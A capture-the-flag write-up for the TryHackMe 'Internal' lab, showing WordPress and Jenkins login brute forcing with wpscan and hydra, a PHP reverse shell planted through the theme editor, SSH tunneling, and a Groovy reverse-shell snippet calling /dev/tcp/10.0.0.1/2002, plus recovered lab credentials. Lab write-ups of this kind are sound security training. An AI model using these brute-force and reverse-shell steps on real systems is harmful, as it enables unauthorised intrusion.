Internal (THM)

TryHackMe Internal Write-Up

topics: wordpress, jenkins, php reverse shell, SSH tunneling, lateral movement, web applications, Linux Privilege Escalation, docker environments, javascript reverse shell

  1. Enumeration

  2. Local Privilege Escalation

  3. Root Privilege Escalation

new tools:

Enumeration

initial nmap scan .././autonmap.sh $ip Full

We have two ports open HTTP and SSH. Visiting the homepage is the default Apache page, lets run a dirsearch scan

We can see from the scan a phpmyadmin page which hosts MYSQL as well as a wordpress login page. Lets run some wpscan commands

wpscan --url internal.thm/blog -e u,p,t

We see there is an admin user for the wordpress site. We can run a quick brute force command with

wpscan --url internal.thm/blog/wp-login.php --passwords rockyou.txt --usernames admin

The brute force attack was successful, we have obtained creds of admin:my2boys for the wordpress login

We can inspect what the admin did previously on this site, including a couple blog posts.

Cleartext credentials were left for us, william:arnold147. These creds however are not valid for SSH, wordpress or phpmyadmin. Instead lets inspect the plugins and themes to upload a PHP reverse shell.

Initial Access

Navigating to the theme editor, we can see it uses the theme "Twenty Seventeen" where we can replace the 404.php file with the default Kali PHP reverse shell.

Listening for the shell and executing the request to http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php

Local Privilege Escalation

While we have initial access with our PHP shell we can see we are not the default user aubreanna

Running LinEnum.sh and enumerating the OS yields some interesting information like another port open locally on 8080 running a docker proxy.

This did not return anything of use relating to aubreanna until inspecting the /opt directory.

We now have the credentials for aubreanna and we are able to SSH in using aubreanna:bubb13guM!@#123

Lateral Movement

There is no command we can use with sudo -l nor is there any relevant SUID file. However, from the LinEnum script we know that port 8080 is exposed locally, lets try and SSH tunnel in to view what's running on the port.

ssh -L 8080:localhost:8080 aubreanna@10.10.48.50

We have a Jenkins server running on this port, none of the three credentials we've obtained worked so instead lets brute force with hydra. Check developer tools for POST request specifics like login page and error message.

hydra -l admin -P /root/payloads/rockyou.txt localhost -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

We've successfully brute forced the admin account for the creds admin:spongebob logging in reveals a way to establish a reverse shell on this box. Navigating to "Manage Jenkins" reveals a script console for executing JavaScript code.

We can run the following js code from pentest monkey and establish a reverse shell on this new machine. 

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Root Privilege Escalation

Checking the /opt directory once more reveals the root credentials root:tr0ub13guM!@#123

We can now SSH into the main machine

PreviousDaily Bugle (THM)NextUnbaked Pie (THM)

Last updated